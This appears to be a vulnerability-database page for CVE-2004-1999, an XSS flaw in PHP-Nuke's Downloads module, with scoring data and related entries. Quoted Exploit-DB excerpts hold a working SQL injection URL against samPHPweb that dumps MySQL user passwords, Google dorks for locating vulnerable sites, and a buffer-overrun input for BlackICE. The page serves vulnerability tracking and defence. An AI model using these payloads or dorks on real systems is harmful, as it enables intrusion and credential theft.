CVE-2004-1999
published 2004-05-05CVE-2004-1999: Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to inject arbitrary HTML and web script…
PriorityP415medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
1.26%
65.8th percentile
Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to inject arbitrary HTML and web script via the (1) ttitle or (2) sid parameters to modules.php.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat2.1LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9crw-h8v9-v2xf: Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6
ghsa_unreviewed·2022-04-29
CVE-2004-1999 [MEDIUM] GHSA-9crw-h8v9-v2xf: Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6
Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to inject arbitrary HTML and web script via the (1) ttitle or (2) sid parameters to modules.php.
Red Hat
CVE-2004-0603: gzexe in gzip 1
vendor_redhat·CVSS 2.1
CVE-2004-0603 [LOW] CVE-2004-0603: gzexe in gzip 1
gzexe in gzip 1.3.3 and earlier will execute an argument when the creation of a temp file fails instead of exiting the program, which could allow remote attackers or local users to execute arbitrary commands, a different vulnerability than CVE-1999-1332.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
No detection rules found.
Exploit-DB
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
exploitdb·2008-01-05
CVE-2008-0187 samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
samPHPweb 4.2.2 - 'songinfo.php' SQL Injection
---
Title:samPHPweb (songinfo.php) Remote SQL Injection
Script:samPHPweb
Download:http://www.spacialaudio.com/download/samPHPweb.zip
Bug:songinfo.php
Author:BackDoor
Dork1:inurl:samPHPweb/playing.php
Dork2:This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
Exploit:
www.victim.com/scriptpath/songinfo.php?songid=-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,password,user,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/from/**/mysql.user
# milw0rm.com [2008-01-05]
Exploit-DB
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
exploitdb·2008-01-04
CVE-2008-0143 samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
samPHPweb 4.2.2 - 'db.php' Remote File Inclusion
---
+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Script.......: samPHPweb
* [~] Page.........: http://support.spacialaudio.com/forums/viewforum.php?f=22 & http://www.spacialaudio.com/
* [~] Author.......: Crackers_Child | [email protected] & [email protected]
* [~] Class........: Remote File İnclude Vulnerability
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
* [~] Dork.........: This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions
* [~] Dork.........: This page was produced using SAM2 (Streaming Audio Manager)
+____________________________________
Exploit-DB
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
exploitdb·2004-08-11
CVE-2004-1714 Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
---
source: https://www.securityfocus.com/bid/10915/info
It is reported that BlackICE PC Protection is prone to a local buffer overrun when handling excessive input in certain configuration directives parsed from the firewall.ini file included with the software.
It is reported that when the system is restarted, and the affected software reads the malicious firewall.ini file both the blackice.exe and blackd.exe executables will crash.
REJECT, 138, default, 1999-07-22 20:26:53, AAAAAAAAAAAAAAAAA.... , 2000,
unknown
(Aprox 1000 A's)
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108378804809891&w=2http://secunia.com/advisories/11553http://www.waraxe.us/index.php?modname=sa&id=27https://exchange.xforce.ibmcloud.com/vulnerabilities/16073http://marc.info/?l=bugtraq&m=108378804809891&w=2http://secunia.com/advisories/11553http://www.waraxe.us/index.php?modname=sa&id=27https://exchange.xforce.ibmcloud.com/vulnerabilities/16073
2004-05-05
Published